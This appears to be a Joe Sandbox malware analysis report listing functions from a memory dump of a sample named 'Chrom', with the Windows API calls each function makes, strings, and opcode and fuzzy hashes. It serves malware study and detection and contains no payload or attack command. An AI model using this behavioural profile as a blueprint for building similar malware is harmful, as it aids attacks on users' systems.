                                                                                                                                                        • Instruction ID: fee6c053b5955f725308cf381fe1744ee842b03cbd95df917c5b16bd142f82aa
                                                                                                                                                        • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                        • Instruction Fuzzy Hash: B4D0C9B2225711EBE621EA748C01BDBA7D46B84720F009C1AB191D6190D764D854565A
                                                                                                                                                        Function 0043917D Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 242COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: d
                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                        • Opcode ID: a76db7e4c54f4a7d8ce000c0450a4b0bfb47c91072e90eb52a1bbb69a31df567
                                                                                                                                                        • Instruction ID: 8f6596d4f93993bca5fedc02ea909bb24cc5f22f60e220bd561afb4714264618
                                                                                                                                                        • Opcode Fuzzy Hash: a76db7e4c54f4a7d8ce000c0450a4b0bfb47c91072e90eb52a1bbb69a31df567
                                                                                                                                                        • Instruction Fuzzy Hash: 3781AD716083029BDB10EF16D881A6F77E0AF89358F14092FF89497291D7B8DD45CB9A
                                                                                                                                                        Function 00420E2A Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset
                                                                                                                                                        • String ID: BINARY
                                                                                                                                                        • API String ID: 2221118986-907554435
                                                                                                                                                        • Opcode ID: 60e0f8e27434ffc42e071fb85a3f10dba614baad71011669f295a7aba79e687e
                                                                                                                                                        • Instruction ID: 26b79014cfc78d58b95db9363976e6c90bc85ae6725c162ac4ac0b56dde6da67
                                                                                                                                                        • Opcode Fuzzy Hash: 60e0f8e27434ffc42e071fb85a3f10dba614baad71011669f295a7aba79e687e
                                                                                                                                                        • Instruction Fuzzy Hash: 4151AD71A043259FDB21CF28E581BAB7BE4AF08350F55446AF849DB342E778D980CBA5
                                                                                                                                                        Function 004121DB Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcsicmp
                                                                                                                                                        • String ID: /stext
                                                                                                                                                        • API String ID: 2081463915-3817206916
                                                                                                                                                        • Opcode ID: faacc565551467a7f9fecfe8be6c9a25ffd216349f1a930335e294746595b54b
                                                                                                                                                        • Instruction ID: 2d0fa8a023af8a82833a79c8a9a2b375c4b98090195f1c385c961b9dc0378c10
                                                                                                                                                        • Opcode Fuzzy Hash: faacc565551467a7f9fecfe8be6c9a25ffd216349f1a930335e294746595b54b
                                                                                                                                                        • Instruction Fuzzy Hash: C0218830B00605AFD704EF66C981BDDF7B9FF94304F10016AA419E7342DBB9AD618B99
                                                                                                                                                        Function 00413E30 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00413E53
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
                                                                                                                                                          • Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B
                                                                                                                                                          • Part of subcall function 004010A6: memset.MSVCRT ref: 004010D3
                                                                                                                                                          • Part of subcall function 004010A6: wcsrchr.MSVCRT ref: 004010EF
                                                                                                                                                          • Part of subcall function 004010A6: memset.MSVCRT ref: 0040110D
                                                                                                                                                          • Part of subcall function 004010A6: memset.MSVCRT ref: 004011AC
                                                                                                                                                          • Part of subcall function 004010A6: CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 004011C3
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                        • String ID: FA
                                                                                                                                                        • API String ID: 1828521557-1137249561
                                                                                                                                                        • Opcode ID: dbe4fe885372198836d1553c0ade92ba4046f6e660ffa4c2721431e6b8765f59
                                                                                                                                                        • Instruction ID: 1b9fe372a81af7ef4fcc301b0704f8a61b654f984bb2216e8f14dd72d3cafccc
                                                                                                                                                        • Opcode Fuzzy Hash: dbe4fe885372198836d1553c0ade92ba4046f6e660ffa4c2721431e6b8765f59
                                                                                                                                                        • Instruction Fuzzy Hash: CB11ACB194021D79EB20F761DC4AFDB776CDF50314F04047BB518A51C2E6B89AD44669
                                                                                                                                                        Function 0040D0D4 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00409C82: CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94
                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040118B,?,?,?,?,000003FF), ref: 0040D0F2
                                                                                                                                                          • Part of subcall function 0040B5F5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040700C), ref: 0040B5FE
                                                                                                                                                          • Part of subcall function 0040A8AE: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5
                                                                                                                                                          • Part of subcall function 0040B170: MultiByteToWideChar.KERNEL32(0040D143,00000000,000000FF,?,00000000,00000000,?,00000000,?,0040D143,?,000000FF,0000FDE9), ref: 0040B189
                                                                                                                                                          • Part of subcall function 0040B170: MultiByteToWideChar.KERNEL32(0040D143,00000000,000000FF,?,00000000,00000000,?,0040D143,?,000000FF,0000FDE9), ref: 0040B1AE
                                                                                                                                                        • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040D146
                                                                                                                                                          • Part of subcall function 0040B671: ??3@YAXPAX@Z.MSVCRT(00000000,0040B5FD,00000000,0040700C), ref: 0040B678
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2445788494-0
                                                                                                                                                        • Opcode ID: b3434e175287108bd8d00d51b0c6cbae2b7fb7d9485ba0b8fd75dd7f0a2e64a6
                                                                                                                                                        • Instruction ID: 8c387e03d8c3aade5b41685a2e02256394b39ebaaf0903d076e01eb80a76af23
                                                                                                                                                        • Opcode Fuzzy Hash: b3434e175287108bd8d00d51b0c6cbae2b7fb7d9485ba0b8fd75dd7f0a2e64a6
                                                                                                                                                        • Instruction Fuzzy Hash: 99115635804208FEDB00AF69DC45C9A7FB4EF45364715C27AF914AB291D7349A09CBA9
                                                                                                                                                        Function 0041725A Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • failed to allocate %u bytes of memory, xrefs: 00417283
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: malloc
                                                                                                                                                        • String ID: failed to allocate %u bytes of memory
                                                                                                                                                        • API String ID: 2803490479-1168259600
                                                                                                                                                        • Opcode ID: 48d3b0d99305b5713d050b9a7aed3c2df143f476be273c6a02e7235a5e54717b
                                                                                                                                                        • Instruction ID: 7af341f115bc0a609711c5f8cf1e2214d5d118070d6e99c1fc297229056b61f8
                                                                                                                                                        • Opcode Fuzzy Hash: 48d3b0d99305b5713d050b9a7aed3c2df143f476be273c6a02e7235a5e54717b
                                                                                                                                                        • Instruction Fuzzy Hash: AFE026B7F09B2263C200961AEC0568277F09FC132571A813BF95CD3280C638DC5B83AA
                                                                                                                                                        Function 0041DB92 Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0041DD36
                                                                                                                                                        • memcmp.MSVCRT(0000006B,?,00000010,?,?,?,?,?,?,?,?,0042110C,00000007,?), ref: 0041DD48
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcmpmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1065087418-0
                                                                                                                                                        • Opcode ID: 1d55d7fb62e4bfc7d9f251faebd1bd6dd92cbbfd5fee9d1820b3c6a6745402c4
                                                                                                                                                        • Instruction ID: 94185df667f8708a14b2030ade84f1c931118ff06ce27a9f792afb950defdc79
                                                                                                                                                        • Opcode Fuzzy Hash: 1d55d7fb62e4bfc7d9f251faebd1bd6dd92cbbfd5fee9d1820b3c6a6745402c4
                                                                                                                                                        • Instruction Fuzzy Hash: CA616BF1E00205EBDB10EFA599C0AEEB7B4AF05308F14447BE50597241E779AEC4DB89
                                                                                                                                                        Function 00410042 Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040E814: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,0041079D,?), ref: 0040E835
                                                                                                                                                          • Part of subcall function 0040E814: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,0041079D,?), ref: 0040E8FC
                                                                                                                                                        • GetStdHandle.KERNEL32(000000F5,?,004122A5,00000000,00000000,?,00000000,00000000,00000000), ref: 00410077
                                                                                                                                                        • CloseHandle.KERNELBASE(00000000,?,004122A5,00000000,00000000,?,00000000,00000000,00000000), ref: 0041019B
                                                                                                                                                          • Part of subcall function 00409C9B: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,00410072,00000000,?,004122A5,00000000,00000000,?,00000000,00000000), ref: 00409CAD
                                                                                                                                                          • Part of subcall function 00409CFB: GetLastError.KERNEL32(00000000,?,004101B0,00000000,?,004122A5,00000000,00000000,?,00000000,00000000,00000000), ref: 00409D0F
                                                                                                                                                          • Part of subcall function 00409CFB: _snwprintf.MSVCRT ref: 00409D3C
                                                                                                                                                          • Part of subcall function 00409CFB: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409D55
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1381354015-0
                                                                                                                                                        • Opcode ID: c352156c60bf5e8969b3410faff8cba1e1f857f4dc2c43362582496339407a16
                                                                                                                                                        • Instruction ID: 773294f2793927884dd3d35b59f4cb20d409429543e063566a68095ef13c6261
                                                                                                                                                        • Opcode Fuzzy Hash: c352156c60bf5e8969b3410faff8cba1e1f857f4dc2c43362582496339407a16
                                                                                                                                                        • Instruction Fuzzy Hash: 10417F31A00200FFCB219F69C885A9E77F6AF49714F21416FF446A7291CBBD9EC0DA59
                                                                                                                                                        Function 0041950E Relevance: 2.5, APIs: 2, Instructions: 24sleepCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00419527
                                                                                                                                                        • CloseHandle.KERNELBASE(0CC483FF,00000000,00000000,0045EBC0,00419B7B,00000008,00000000,00000000,?,00419D38,?,00000000), ref: 00419530
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseHandleSleep
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 252777609-0
                                                                                                                                                        • Opcode ID: 1f38ef6d4e421f8b70049e49d582ab06bd968fb49a388c5a1d937bf22f5392b0
                                                                                                                                                        • Instruction ID: 10c3462ac1369c784e1afd36df35bd7f7ff6f222b97f55253c388b4ed129ec9c
                                                                                                                                                        • Opcode Fuzzy Hash: 1f38ef6d4e421f8b70049e49d582ab06bd968fb49a388c5a1d937bf22f5392b0
                                                                                                                                                        • Instruction Fuzzy Hash: 34E0C23B104216AEC6105BB9ECA099773DAEF9A2387544236F661E61A0C7759C828624
                                                                                                                                                        Function 0040B7D1 Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                        • Opcode ID: 5e97efbfa32821b985a34f27a6b6b563597b1101e70238cb4ba8b6ea1fd80981
                                                                                                                                                        • Instruction ID: 5f0fdca9fe4acc2ecb8b3169f70f33f7bd062bec4b77ce871c218ba77f1467d2
                                                                                                                                                        • Opcode Fuzzy Hash: 5e97efbfa32821b985a34f27a6b6b563597b1101e70238cb4ba8b6ea1fd80981
                                                                                                                                                        • Instruction Fuzzy Hash: 16D048B0805B108ED7B0EF3AD801602BBF0EF08311320CE2EA0AAC2A60EB35A1049F04
                                                                                                                                                        Function 00412D29 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00412DB7: memset.MSVCRT ref: 00412DF6
                                                                                                                                                          • Part of subcall function 0040A5EB: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,00412D6B,00000000,?,00000000,?,00000000), ref: 0040A603
                                                                                                                                                          • Part of subcall function 0040A5EB: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A617
                                                                                                                                                          • Part of subcall function 0040A5EB: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00414002), ref: 0040A620
                                                                                                                                                        • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 00412D75
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2154303073-0
                                                                                                                                                        • Opcode ID: 661eaf95a0eb430a0c353e7e574569b8050dd2ae37d277ca5a708745728aa288
                                                                                                                                                        • Instruction ID: da844e677e512885dbb2ef8f3ceebb0df353419e1ec893dedc4f3fc5669ae239
                                                                                                                                                        • Opcode Fuzzy Hash: 661eaf95a0eb430a0c353e7e574569b8050dd2ae37d277ca5a708745728aa288
                                                                                                                                                        • Instruction Fuzzy Hash: AE113072C00219ABCF01EBA5D9815DEB7B9EF84314F20046BE901F3240D6789F55CB95
                                                                                                                                                        Function 0041607F Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416068: FreeLibrary.KERNELBASE(?,0041608B,00000000,00413FA7,?,?,?,?,?,00403CF9,?), ref: 00416074
                                                                                                                                                          • Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
                                                                                                                                                          • Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA
                                                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004160B2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3150196962-0
                                                                                                                                                        • Opcode ID: 2f6c92ede0ba8efca6cedf9ecbf51a8f1e943e388610fa79aeb44d06da783af3
                                                                                                                                                        • Instruction ID: 5e44a2a6fa684cac6ecb61c9cf4a65bdaa199533b8bbc7fef38ccb5d0a7984e6
                                                                                                                                                        • Opcode Fuzzy Hash: 2f6c92ede0ba8efca6cedf9ecbf51a8f1e943e388610fa79aeb44d06da783af3
                                                                                                                                                        • Instruction Fuzzy Hash: D7F0C2711447125AE630AB7ABC02BE726988F04324F12862FF022E54D0DFACE8C48A68
                                                                                                                                                        Function 00416435 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 0041645C
                                                                                                                                                          • Part of subcall function 004162C5: memset.MSVCRT ref: 004162E4
                                                                                                                                                          • Part of subcall function 004162C5: _itow.MSVCRT ref: 004162FB
                                                                                                                                                          • Part of subcall function 004162C5: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 0041630A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
